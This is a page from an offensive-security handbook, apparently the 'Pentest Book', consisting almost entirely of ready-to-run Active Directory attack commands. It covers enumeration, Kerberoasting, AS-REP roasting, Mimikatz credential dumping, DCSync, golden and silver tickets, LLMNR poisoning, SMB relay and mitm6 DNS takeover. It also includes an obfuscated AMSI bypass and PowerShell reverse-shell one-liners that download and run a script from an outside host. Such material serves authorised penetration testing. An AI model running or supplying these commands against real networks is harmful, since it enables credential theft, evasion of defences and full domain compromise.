Pentest Book
Search…
AD

Info

Basic Active Directory terms

Users

Agent represented by a user account.
    Regular user accounts (used by employees or for specific task as backups)
    Computer accounts (ends with $). Computers in AD are a users subclass.

Services

    Identified by SPN which indicates the service name and class, the owner and the host computer.
    Is executed in a computer (the host of the service) as a process.
    Services (as any process) are running in the context of a user account, with the privileges and permissions of that user.
    The SPN’s of the services owned by an user are stored in the attribute ServicePrincipalName of that account.
    Usually Domain Admin or similar role is required to modify the SPN’s of a user.

General

1
# Anonymous Credential LDAP Dumping:
2
ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)
3
4
# Impacket GetADUsers.py (Must have valid credentials)
5
GetADUsers.py -all -dc-ip
6
7
# Impacket lookupsid.py
8
/usr/share/doc/python3-impacket/examples/lookupsid.py username:[email protected]
9
10
# Windapsearch:
11
# https://github.com/ropnop/windapsearch
12
python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
13
# Go version https://github.com/ropnop/go-windapsearch
14
15
# CME
16
cme smb IP -u '' -p '' --users --shares
17
18
# BloodHound
19
# https://github.com/BloodHoundAD/BloodHound/releases
20
# https://github.com/BloodHoundAD/SharpHound3
21
# https://github.com/chryzsh/DarthSidious/blob/master/enumeration/bloodhound.md
22
Import-Module .\sharphound.ps1
23
. .\SharpHound.ps1
24
Invoke-BloodHound -CollectionMethod All
25
Invoke-BloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password
26
# Bloodhound.py (no shell needed) remote, ldap auth
27
https://github.com/fox-it/BloodHound.py
28
bloodhound-python -u <user> -p '<password>' -ns <dc.ip> -d <domain.name> -c all
29
# BloodHound Cheatsheet
30
# https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
31
# Bloodhound complements
32
# https://github.com/RastreatorTeam/rastreator
33
34
# Rubeus
35
# https://github.com/GhostPack/Rubeus
36
## ASREProasting:
37
Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
38
## Kerberoasting:
39
Rubeus.exe kerberoast /outfile:<output_TGSs_file>
40
Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
41
## Pass the key (PTK):
42
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
43
# Using the ticket on a Windows target:
44
Rubeus.exe ptt /ticket:<ticket_kirbi_file>
45
46
# Password Spraying tool
47
https://github.com/dafthack/DomainPasswordSpray
48
49
# Kerberoast
50
https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
51
52
# Powerview
53
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
54
Find-InterestingDomainShareFile
55
–CheckAccess
56
57
# AD Cheatsheets
58
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
59
60
# References:
61
https://wadcoms.github.io/
62
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
63
https://github.com/infosecn1nja/AD-Attack-Defense
64
https://adsecurity.org/?page_id=1821
65
https://github.com/sense-of-security/ADRecon
66
https://adsecurity.org/?p=15
67
https://adsecurity.org/?cat=7
68
https://adsecurity.org/?page_id=4031
69
https://www.fuzzysecurity.com/tutorials/16.html
70
https://blog.stealthbits.com/complete-domain-compromise-with-golden-tickets/
71
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
72
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain
73
https://adsecurity.org/?p=1588
74
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
75
https://www.harmj0y.net/blog/tag/powerview/
76
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos
Copied!

Common vulns

1
# Users having rights to add computers to domain
2
add-computer –domainname org.local -Credential ORG\john -restart –force
3
4
# AdminCount attribute set on common users
5
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
6
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
7
Import-Module ActiveDirectory
8
Get-AdObject -ldapfilter "(admincount=1)" -properties admincount
9
10
# High number of users in privileged groups
11
net group "Schema Admins" /domain
12
net group "Domain Admins" /domain
13
net group "Enterprise Admins" /domain
14
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
15
- Linux:
16
net rpc group members 'Schema Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
17
net rpc group members 'Domain Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
18
net rpc group members 'Enterprise Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
19
net rpc group members 'Domain Admins' -I 10.10.30.52 -U "john"%"pass123"
20
21
# Service accounts being members of Domain Admins
22
net group "Schema Admins" /domain
23
net group "Domain Admins" /domain
24
net group "Enterprise Admins" /domain
25
26
# Excessive privileges allowing for shadow Domain Admins
27
Bloodhound/Sharphound
28
29
# Service accounts vulnerable to Kerberoasting
30
GetUserSPNs.py -request example.com/john:pass123
31
hashcat -m 13100 -a 0 -O --self-test-disable hashes.txt wordlist.txt
32
33
# Users with non-expiring passwords
34
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
35
grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
36
- PS
37
Import-Module ActiveDirectory
38
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq "true" } | where {$_.enabled -eq "true" }
39
40
# Users with password not required
41
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
42
grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
43
- PS
44
Import-Module ActiveDirectory
45
Get-ADUser -Filter {UserAccountControl -band 0x0020}
46
47
# Storing passwords using reversible encryption
48
mimikatz # lsadump::dcsync /domain:example.com /user:poorjohn
49
50
# Storing passwords using LM hashes
51
- In NTDS.dit
52
grep -iv ':aad3b435b51404eeaad3b435b51404ee:' dumped_hashes.txt
53
54
# Service accounts vulnerable to AS-REP roasting
55
GetNPUsers.py example.com/ -usersfile userlist.txt -format hashcat -no-pass
56
GetNPUsers.py example.com/john:pass123 -request -format hashcat
57
hashcat -m 18200 -a 0 -O --self-test-disable hashes.txt wordlist.txt
58
- PS
59
Import-Module ActiveDirectory
60
Get-ADuser -filter * -properties DoesNotRequirePreAuth | where {$._DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name
61
62
# Weak domain password policy
63
net accounts /domain
64
polenum --username john --password pass123 --domain 10.10.51.11
65
enum4linux -P -u john -p pass123 -w dom.local 172.21.1.60
66
67
# Inactive domain accounts
68
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
69
sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'
70
71
# Privileged users with password reset overdue
72
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
73
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt
74
75
while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
76
grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'
77
78
# Users with a weak password
79
$a = [adsisearcher](&(objectCategory=person)(objectClass=user))
80
$a.PropertiesToLoad.add(“samaccountname”) | out-null
81
$a.PageSize = 1
82
$a.FindAll() | % { echo $_.properties.samaccountname } > users.txt
83
84
Import-Module ./adlogin.ps1
85
adlogin users.txt domain.com password123
86
87
# Credentials in SYSVOL and Group Policy Preferences (GPP)
88
findstr /s /n /i /p password \\example.com\sysvol\example.com\*
89
mount.cifs -o domain=example.com,username=john,password="[email protected]" //10.10.139.115/SYSVOL /mnt
90
grep -ir 'password' /mnt
Copied!

Quick tips

1
# Amsi bypass
2
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
3
4
# Powershell Execution policy Bypass
5
powershell -ep bypass
6
7
# To input the output of the first command into second command use this powershell technique
8
# %{} is an alias for ForEach-Object{}
9
# ?{} is an alias for Where-Object{}
10
# $_ is variable
11
<First command> | %{<Second command> -<argument> $_}
12
13
# To filter out an object type we can use this technique with pipe.
14
?{$_.<object> -eq '<value>’'}
15
16
# Find local admin access
17
Find-LocalAdminAccess
18
19
# Get Domain sid
20
Get-DomainSID
21
Arguments -Domain “domain name”
22
23
# Get DC
24
Get-NetDomainController
25
Arguments -Domain “domain name”
26
27
# Get users in current domain
28
Get-NetUser
29
Arguments -UserName “username”
30
31
# Get user properties
32
Get-UserProperty
33
Arguments -Properties pwdlastset
34
35
# Search for a particular string in a user's attributes
36
Find-UserField -SearchField Description -SearchTerm ”built”
37
38
# Get all computers
39
Get-NetComputer -FullData
40
Many arguments -OperatingSystem -Ping -FullData
41
42
# Get groups
43
Get-NetGroup
44
Arguments -FullData -Domain
45
46
# Get members of a particular group
47
Get-NetGroupMember -GroupName "Domain Admins"
48
49
# Group Policies
50
Get-NetGPO Get-NetGPO -ComputerName Get-NetGPOGroup
51
52
# Get users that are part of a Machine's local Admin group
53
Find-GPOComputerAdmin -ComputerName
54
55
# Get OUs
56
Get-NetOU -FullData Get-NetGPO -GPOname
57
58
# Mapping forest
59
Get-NetForest -Verbose
60
Get-NetForestDomain -Verbose
61
62
# Mapping trust
63
Get-NetDomainTrust
64
Arguments -Domain
65
Get-NetForestDomain -Verbose | Get-NetDomainTrust
66
67
# Finding Constrained Delegation
68
Get-DomainUser -TrustedToAuth (Poweview Dev.)
69
70
# Finding UnConstrained Delegation
71
Get-NetComputer -UnConstrained
72
73
# Get ACLs
74
Get-ObjectAcl -SamAccountName -ResolveGUIDs Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose
75
76
# Search for interesting ACEs
77
Invoke-ACLScanner -ResolveGUIDs
78
79
# Reverse Shell
80
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.113/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443
81
powershell.exe iex (iwr http://172.16.100.113/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.113 -Port 443
82
83
#Mimikatz
84
# Make ntlm ps-session
85
Invoke-Mimikatz -Command '"sekurlsa::pth /user: /domain: /ntlm: /run:powershell.exe"'
86
87
# Dump creds
88
Invoke-Mimikatz
89
Invoke-Mimikatz -Command ‘“lsadump::lsa /patch”’
90
Invoke-Mimikatz -Command '"lsadump::dcsync /user:\krbtgt"'
91
(dcsync requires 3 permission )
92
93
# Tickets
94
Inject ticket:-
95
Invoke-Mimikatz -Command '"kerberos::ptt <location of .kirbi tkt>"'
96
Export Tickets:-
97
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
98
99
# Golden tkt
100
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:<krbtgt hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
101
102
# Silver tkt
103
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<target> /service:<ServiceType> /rc4:<rc4 NTLM Hash of user> /user:<UserToImpersonate> /ptt"'
104
105
# TGT tkt
106
kekeo.exe tgt::ask /user:<user name> /domain:<domain name> /rc4:<rc4 NTLM Hash of user>
107
108
# TGS tkt
109
Kekeo.exe
110
tgs::s4u /tgt:tgt_ticket.kirbi /user:<user>@<domain> /service:<service name>/<server name>
Copied!

LLMNR Poisoning

1
# Previously NBT-NS
2
# Identify hosts without DNS
3
# Services utilize user's username and NTLMv2 hash
4
5
# Capturing NTLMv2 with Responder
6
responder -I eth0 -rdwv 
7
8
# Cracking NTLMv2
9
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt --force
Copied!

SMB Relay Attack

1
# SMB signing must be disabled on the target to work
2
# User who's credentials are being relayed should be an admin on both the machines
3
4
# Discover host with SMB signing disabled
5
nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24
6
7
# SMB Relay Attack
8
# Set Responder config SMB and HTTP off
9
responder -I eth0 -rdwv
10
ntlmrelayx.py -tf target.txt -smb2support
Copied!

IPv6 DNS Takeover via Mitm6

1
git clone https://github.com/fox-it/mitm6.git
2
pip install mitm6
3
mitm6 -d domain.name
4
# During before step, in other terminal run
5
ntlmrelayx.py -6 -t ldaps://192.168.176.129 -wh fakewpadhost.domain.name -l dir
Copied!

AD Mindmap

https://t.co/hE0VKO5b2I?amp=1
Pentesting_Active_directory
https://xmind.net/m/5dypm8/
Last modified 1mo ago